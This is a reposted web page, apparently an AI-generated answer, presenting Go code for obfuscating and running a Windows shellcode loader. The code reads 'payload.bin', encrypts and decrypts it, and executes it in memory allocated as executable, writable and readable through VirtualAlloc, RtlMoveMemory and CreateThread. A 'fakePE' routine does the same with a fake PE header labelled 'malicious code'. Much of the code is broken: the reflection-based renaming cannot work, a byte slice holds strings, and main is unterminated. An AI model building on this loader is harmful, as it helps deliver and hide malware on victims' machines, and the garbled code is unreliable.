Go代码混淆:将多个代码段整合为可运行代码
package main
import ( "crypto/aes" "crypto/cipher" "encoding/base64" "io/ioutil" "reflect" "strconv" "syscall" "time" "unsafe" )
const ( MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READWRITE = 0x40 )
var ( kernel32 = syscall.NewLazyDLL("kernel32.dll") ntdll = syscall.NewLazyDLL("ntdll.dll") VirtualAlloc = kernel32.NewProc("VirtualAlloc") RtlMoveMemory = ntdll.NewProc("RtlMoveMemory") CreateThread = kernel32.NewProc("CreateThread") )
var func0 CipherFunc var func1 func(cipher CipherFunc, key []byte, src []byte) []byte var func2 func(src string) string var func3 func(src string) []byte var func4 func(charcode []byte) var func5 func(filename string) []byte var func6 func()
var var0 []byte var var1 [][]byte var var2 []string var var3 []string var var4 []string var var5 []string var var6 []string
func init() { func0 = AesCipher func1 = Crypt func2 = Encode func3 = Decode func4 = exec func5 = readFile func6 = fakePE
var0 = []byte{
0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B,
0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B,
0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B,
}
var1 = [][]byte{
{"AesKey", "key", "src", "block", "iv", "stream", "dst"},
{"cipher", "key", "src"},
{"src", "payloadBytes", "encodedBytes", "bdata"},
{"src", "decodedBytes", "payloadBytes"},
{"charcode", "addr", "handle"},
{"filename", "data"},
{"payload", "encodedPayload", "shellCodeHex"},
}
var2 = []string{"AesCipher", "Crypt", "Encode", "Decode", "exec", "readFile", "fakePE"}
var3 = []string{"func0", "func1", "func2", "func3", "func4", "func5", "func6"}
var4 = []string{"var0", "var1", "var2", "var3", "var4", "var5", "var6"}
var5 = []string{"payload.bin"}
var6 = []string{"main"}
}
func obfuscate() { for i, name := range var2 { newName := "func" + strconv.Itoa(i) reflect.ValueOf(&func0).Elem().FieldByName(name).Set(reflect.ValueOf(newName)) }
for i, name := range var4 {
variable := reflect.ValueOf(&var0).Elem().FieldByName(name)
if variable.IsValid() {
variable.Set(reflect.ValueOf(var0))
} else {
variable = reflect.ValueOf(&var1).Elem().FieldByName(name)
if variable.IsValid() {
variable.Set(reflect.ValueOf(var1))
} else {
variable = reflect.ValueOf(&var2).Elem().FieldByName(name)
if variable.IsValid() {
variable.Set(reflect.ValueOf(var2))
} else {
variable = reflect.ValueOf(&var3).Elem().FieldByName(name)
if variable.IsValid() {
variable.Set(reflect.ValueOf(var3))
} else {
variable = reflect.ValueOf(&var4).Elem().FieldByName(name)
if variable.IsValid() {
variable.Set(reflect.ValueOf(var4))
} else {
variable = reflect.ValueOf(&var5).Elem().FieldByName(name)
if variable.IsValid() {
variable.Set(reflect.ValueOf(var5))
} else {
variable = reflect.ValueOf(&var6).Elem().FieldByName(name)
if variable.IsValid() {
variable.Set(reflect.ValueOf(var6))
}
}
}
}
}
}
}
}
}
func AesCipher(key []byte, src []byte) []byte { block, _ := aes.NewCipher(key) iv := make([]byte, aes.BlockSize) stream := cipher.NewCTR(block, iv) dst := make([]byte, len(src)) stream.XORKeyStream(dst, src) return dst }
type CipherFunc func(key []byte, src []byte) []byte
func Crypt(cipher CipherFunc, key []byte, src []byte) []byte { return cipher(key, src) }
func Encode(src string) string { payloadBytes := []byte(src) encodedBytes := Crypt(AesCipher, var0, payloadBytes) bdata := base64.StdEncoding.EncodeToString(encodedBytes) return bdata }
func Decode(src string) []byte { decodedBytes, _ := base64.StdEncoding.DecodeString(src) payloadBytes := Crypt(AesCipher, var0, decodedBytes) return payloadBytes }
func exec(charcode []byte) { addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) time.Sleep(5) _, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode))) time.Sleep(5) handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0) time.Sleep(5) syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE) }
func readFile(filename string) []byte { data, _ := ioutil.ReadFile(filename) return data }
func fakePE() { header := []byte{ // DOS Header 0x4D, 0x5A, // 'MZ' 0x90, 0x00, // Stub program
// PE Header
0x50, 0x45, 0x00, 0x00, // 'PE\0\0'
// ...
}
charcode := []byte("malicious code")
data := append(header, charcode...)
addr, _, _ := VirtualAlloc.Call(0, uintptr(len(data)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
time.Sleep(5)
_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&data[0])), uintptr(len(data)))
time.Sleep(5)
handle, _, _ := CreateThread.Call(0, 0, addr, 0, 0, 0)
time.Sleep(5)
syscall.WaitForSingleObject(syscall.Handle(handle), syscall.INFINITE)
}
func main() { obfuscate() payload := string(readFile(var5[0])) encodedPayload := Encode(payload) shellCodeHex := Decode(encodedPayload) func4(shellCodeHex)
原文地址: https://www.cveoy.top/t/topic/lKGs 著作权归作者所有。请勿转载和采集!